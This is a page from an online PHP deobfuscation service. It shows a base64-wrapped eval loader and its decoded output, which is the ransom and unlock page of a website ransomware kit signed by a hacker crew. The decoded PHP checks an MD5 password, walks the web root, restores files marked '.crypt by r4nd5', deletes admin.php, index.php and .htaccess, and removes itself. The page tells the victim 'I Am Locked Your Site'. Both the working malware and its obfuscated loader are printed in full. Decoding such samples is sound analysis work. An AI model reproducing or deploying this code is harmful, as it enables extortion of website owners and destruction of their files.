Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval('?>'.base64_decode('PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxoZWFkPg0KCTx0aXRsZT5XYW5..
Decoded Output download
?>b'<!DOCTYPE html>
<html>
<head>
<title>WannaCry Not Found</title>
<link rel="shortcut icon" type="https://cdn.pixabay.com/photo/2013/07/12/19/23/power-154692_640.png">
<style>
*{
padding: 0; margin: 0;
}
p {
color: black;
}
h4 {
color: red;
font-family: "Comic Sans Ms", cursive;
font-size: 22px;
}
h3 {
color: red;
font-family: "Comic Sans Ms", cursive;
font-size: 16px;
}
h2{
color:#50626C;
text-align: center;
font-family: arial;
text-transform: uppercase;
border: 3px solid #f1f1f1;
padding: 5px;
width: 490px;
margin: auto;
margin-bottom: 10px;
margin-top: 20px;
}
form {
border: 3px solid red;
font-family: arial;
width: 700px;
margin: auto;
}
input[type=email], input[type=password] {
width: 100%;
padding: 12px 20px;
margin: 8px 0;
display: inline-block;
border: 1px solid black;
box-sizing: border-box;
background-color: transparent;
color: red;
}
label{
color: red;
text-transform: uppercase;
}
button {
background-color: red;
color: white;
padding: 14px 20px;
margin: 8px 0;
border: none;
cursor: pointer;
width: 100%;
}
button:hover {
opacity: 0.8;
}
.cancelbtn {
width: auto;
padding: 10px 18px;
background-color: #f03434;
}
.imgcontainer {
text-align: center;
margin: 24px 0 12px 0;
}
img.avatar {
width: 40%;
border-radius: 50%;
}
.container {
padding: 16px;
}
body {
background-color: white;
}
}
</style>
<?php
error_reporting(0);
$input = $_POST[\'pass\'];
$pass = "ccbe78546a65e4d4b12262fcf10d63aa";
if(isset($input)) {
if(md5($input) == $pass) {
function decfile($filename){
if (strpos($filename, \'.crypt by r4nd5\') === FALSE) {
return;
}
$decrypted = gzinflate(file_get_contents($filename));
file_put_contents(str_replace(\'.crypt by r4nd5\', \'\', $filename), $decrypted);
unlink(\'admin.php\');
unlink(\'index.php\');
unlink(\'.htaccess\');
unlink($filename);
echo "$filename UNLOCKED !!!<br>";
}
function decdir($dir){
$files = array_diff(scandir($dir), array(\'.\', \'..\'));
foreach($files as $file) {
if(is_dir($dir."/".$file)){
decdir($dir."/".$file);
}else {
decfile($dir."/".$file);
}
}
}
decdir($_SERVER[\'DOCUMENT_ROOT\']);
echo "<br>We Are Anonymous<br>";
unlink($_SERVER[\'PHP_SELF\']);
unlink(\'.htaccess\');
copy(\'htabackup\',\'.htaccess\');
echo \'Success !!!\';
} else {
echo \'Failed Password !!!\';
}
exit();
}
?>
</head>
<body>
<h2>I Am Locked Your Site</h2>
<form method="post">
<div class="imgcontainer">
<img src="https://cdn.pixabay.com/photo/2013/07/12/19/23/power-154692_640.png" alt="Mr.R4ND5" class="avatar"><h4>WannaCry Not Found</h4>
</div>
<div class="container">
<label for="iml"><b>Email</b></label>
<input type="email" placeholder="Enter Email" name="email" required id="iml">
<label for="psw"><b>Password</b></label>
<input type="password" placeholder="Enter Password" name="pass" required id="psw">
<button type="submit">Decrypt</button><hr><br><h3>CopyRight 2k19 Mr.R4ND5@22Xploiter Crew</h3>
</form>
</body>
<iframe width="0" height="0" src="https://api.soundcloud.com/tracks/323980305/stream?client_id=a3e059563d7fd3372b49b37f00a00bcf" frameborder="0" allowfullscreen></iframe>
</html>'<?php Did this file decode correctly?
Original Code
<?php eval('?>'.base64_decode('PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxoZWFkPg0KCTx0aXRsZT5XYW5uYUNyeSBOb3QgRm91bmQ8L3RpdGxlPg0KCTxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgdHlwZT0iaHR0cHM6Ly9jZG4ucGl4YWJheS5jb20vcGhvdG8vMjAxMy8wNy8xMi8xOS8yMy9wb3dlci0xNTQ2OTJfNjQwLnBuZyI+DQo8c3R5bGU+DQoJDQoJKnsNCiAgICBwYWRkaW5nOiAwOyBtYXJnaW46IDA7DQp9DQpwIHsNCgljb2xvcjogYmxhY2s7DQp9DQpoNCB7DQoJY29sb3I6IHJlZDsNCglmb250LWZhbWlseTogIkNvbWljIFNhbnMgTXMiLCBjdXJzaXZlOw0KCWZvbnQtc2l6ZTogMjJweDsNCn0NCmgzIHsNCgljb2xvcjogcmVkOw0KCWZvbnQtZmFtaWx5OiAiQ29taWMgU2FucyBNcyIsIGN1cnNpdmU7DQoJZm9udC1zaXplOiAxNnB4Ow0KfQ0KaDJ7DQoJY29sb3I6IzUwNjI2QzsNCgl0ZXh0LWFsaWduOiBjZW50ZXI7DQoJZm9udC1mYW1pbHk6IGFyaWFsOw0KCXRleHQtdHJhbnNmb3JtOiB1cHBlcmNhc2U7DQoJYm9yZGVyOiAzcHggc29saWQgI2YxZjFmMTsNCglwYWRkaW5nOiA1cHg7DQoJd2lkdGg6IDQ5MHB4Ow0KCW1hcmdpbjogYXV0bzsNCgltYXJnaW4tYm90dG9tOiAxMHB4Ow0KICAgIG1hcmdpbi10b3A6IDIwcHg7DQp9DQpmb3JtIHsNCiAgICBib3JkZXI6IDNweCBzb2xpZCByZWQ7DQogICAgZm9udC1mYW1pbHk6IGFyaWFsOw0KICAgIHdpZHRoOiA3MDBweDsNCiAgICBtYXJnaW46IGF1dG87DQp9DQoNCmlucHV0W3R5cGU9ZW1haWxdLCBpbnB1dFt0eXBlPXBhc3N3b3JkXSB7DQogICAgd2lkdGg6IDEwMCU7DQogICAgcGFkZGluZzogMTJweCAyMHB4Ow0KICAgIG1hcmdpbjogOHB4IDA7DQogICAgZGlzcGxheTogaW5saW5lLWJsb2NrOw0KICAgIGJvcmRlcjogMXB4IHNvbGlkIGJsYWNrOw0KICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7DQogICAgYmFja2dyb3VuZC1jb2xvcjogdHJhbnNwYXJlbnQ7DQogICAgY29sb3I6IHJlZDsNCn0NCmxhYmVsew0KCWNvbG9yOiByZWQ7DQoJdGV4dC10cmFuc2Zvcm06IHVwcGVyY2FzZTsNCn0NCmJ1dHRvbiB7DQogICAgYmFja2dyb3VuZC1jb2xvcjogcmVkOw0KICAgIGNvbG9yOiB3aGl0ZTsNCiAgICBwYWRkaW5nOiAxNHB4IDIwcHg7DQogICAgbWFyZ2luOiA4cHggMDsNCiAgICBib3JkZXI6IG5vbmU7DQogICAgY3Vyc29yOiBwb2ludGVyOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KDQpidXR0b246aG92ZXIgew0KICAgIG9wYWNpdHk6IDAuODsNCn0NCg0KLmNhbmNlbGJ0biB7DQogICAgd2lkdGg6IGF1dG87DQogICAgcGFkZGluZzogMTBweCAxOHB4Ow0KICAgIGJhY2tncm91bmQtY29sb3I6ICNmMDM0MzQ7DQp9DQoNCi5pbWdjb250YWluZXIgew0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCiAgICBtYXJnaW46IDI0cHggMCAxMnB4IDA7DQp9DQoNCmltZy5hdmF0YXIgew0KICAgIHdpZHRoOiA0MCU7DQogICAgYm9yZGVyLXJhZGl1czogNTAlOw0KfQ0KDQouY29udGFpbmVyIHsNCiAgICBwYWRkaW5nOiAxNnB4Ow0KfQ0KYm9keSB7DQoJYmFja2dyb3VuZC1jb2xvcjogd2hpdGU7DQp9DQp9DQoJDQo8L3N0eWxlPg0KPD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCiRpbnB1dCA9ICRfUE9TVFsncGFzcyddOw0KJHBhc3MgPSAiY2NiZTc4NTQ2YTY1ZTRkNGIxMjI2MmZjZjEwZDYzYWEiOw0KaWYoaXNzZXQoJGlucHV0KSkgew0KaWYobWQ1KCRpbnB1dCkgPT0gJHBhc3MpIHsNCmZ1bmN0aW9uIGRlY2ZpbGUoJGZpbGVuYW1lKXsNCglpZiAoc3RycG9zKCRmaWxlbmFtZSwgJy5jcnlwdCBieSByNG5kNScpID09PSBGQUxTRSkgew0KCXJldHVybjsNCgl9DQoJJGRlY3J5cHRlZCA9IGd6aW5mbGF0ZShmaWxlX2dldF9jb250ZW50cygkZmlsZW5hbWUpKTsNCglmaWxlX3B1dF9jb250ZW50cyhzdHJfcmVwbGFjZSgnLmNyeXB0IGJ5IHI0bmQ1JywgJycsICRmaWxlbmFtZSksICRkZWNyeXB0ZWQpOw0KCXVubGluaygnYWRtaW4ucGhwJyk7DQoJdW5saW5rKCdpbmRleC5waHAnKTsNCgl1bmxpbmsoJy5odGFjY2VzcycpOw0KCXVubGluaygkZmlsZW5hbWUpOw0KCWVjaG8gIiRmaWxlbmFtZSBVTkxPQ0tFRCAhISE8YnI+IjsNCn0NCg0KZnVuY3Rpb24gZGVjZGlyKCRkaXIpew0KCSRmaWxlcyA9IGFycmF5X2RpZmYoc2NhbmRpcigkZGlyKSwgYXJyYXkoJy4nLCAnLi4nKSk7DQoJCWZvcmVhY2goJGZpbGVzIGFzICRmaWxlKSB7DQoJCQlpZihpc19kaXIoJGRpci4iLyIuJGZpbGUpKXsNCgkJCQlkZWNkaXIoJGRpci4iLyIuJGZpbGUpOw0KCQkJfWVsc2Ugew0KCQkJCWRlY2ZpbGUoJGRpci4iLyIuJGZpbGUpOw0KCQl9DQoJfQ0KfQ0KDQpkZWNkaXIoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSk7DQplY2hvICI8YnI+V2UgQXJlIEFub255bW91czxicj4iOw0KdW5saW5rKCRfU0VSVkVSWydQSFBfU0VMRiddKTsNCnVubGluaygnLmh0YWNjZXNzJyk7DQpjb3B5KCdodGFiYWNrdXAnLCcuaHRhY2Nlc3MnKTsNCmVjaG8gJ1N1Y2Nlc3MgISEhJzsNCn0gZWxzZSB7DQplY2hvICdGYWlsZWQgUGFzc3dvcmQgISEhJzsNCn0NCmV4aXQoKTsNCn0NCj8+DQo8L2hlYWQ+DQo8Ym9keT4NCg0KPGgyPkkgQW0gTG9ja2VkIFlvdXIgU2l0ZTwvaDI+DQoNCjxmb3JtIG1ldGhvZD0icG9zdCI+DQogIDxkaXYgY2xhc3M9ImltZ2NvbnRhaW5lciI+DQogICAgPGltZyBzcmM9Imh0dHBzOi8vY2RuLnBpeGFiYXkuY29tL3Bob3RvLzIwMTMvMDcvMTIvMTkvMjMvcG93ZXItMTU0NjkyXzY0MC5wbmciIGFsdD0iTXIuUjRORDUiIGNsYXNzPSJhdmF0YXIiPjxoND5XYW5uYUNyeSBOb3QgRm91bmQ8L2g0Pg0KICA8L2Rpdj4NCg0KICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPg0KICAgIDxsYWJlbCBmb3I9ImltbCI+PGI+RW1haWw8L2I+PC9sYWJlbD4NCiAgICA8aW5wdXQgdHlwZT0iZW1haWwiIHBsYWNlaG9sZGVyPSJFbnRlciBFbWFpbCIgbmFtZT0iZW1haWwiIHJlcXVpcmVkIGlkPSJpbWwiPg0KDQogICAgPGxhYmVsIGZvcj0icHN3Ij48Yj5QYXNzd29yZDwvYj48L2xhYmVsPg0KICAgIDxpbnB1dCB0eXBlPSJwYXNzd29yZCIgcGxhY2Vob2xkZXI9IkVudGVyIFBhc3N3b3JkIiBuYW1lPSJwYXNzIiByZXF1aXJlZCBpZD0icHN3Ij4NCiAgICAgICAgDQogICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiPkRlY3J5cHQ8L2J1dHRvbj48aHI+PGJyPjxoMz5Db3B5UmlnaHQgMmsxOSBNci5SNE5ENUAyMlhwbG9pdGVyIENyZXc8L2gzPg0KPC9mb3JtPg0KPC9ib2R5Pg0KPGlmcmFtZSB3aWR0aD0iMCIgaGVpZ2h0PSIwIiBzcmM9Imh0dHBzOi8vYXBpLnNvdW5kY2xvdWQuY29tL3RyYWNrcy8zMjM5ODAzMDUvc3RyZWFtP2NsaWVudF9pZD1hM2UwNTk1NjNkN2ZkMzM3MmI0OWIzN2YwMGEwMGJjZiIgZnJhbWVib3JkZXI9IjAiIGFsbG93ZnVsbHNjcmVlbj48L2lmcmFtZT4NCjwvaHRtbD4=').'<?php '); ?>
Function Calls
| base64_decode | 1 |
Stats
| MD5 | b8351d9f80ca0f8a4163cdf940f6fb29 |
| Eval Count | 1 |
| Decode Time | 53 ms |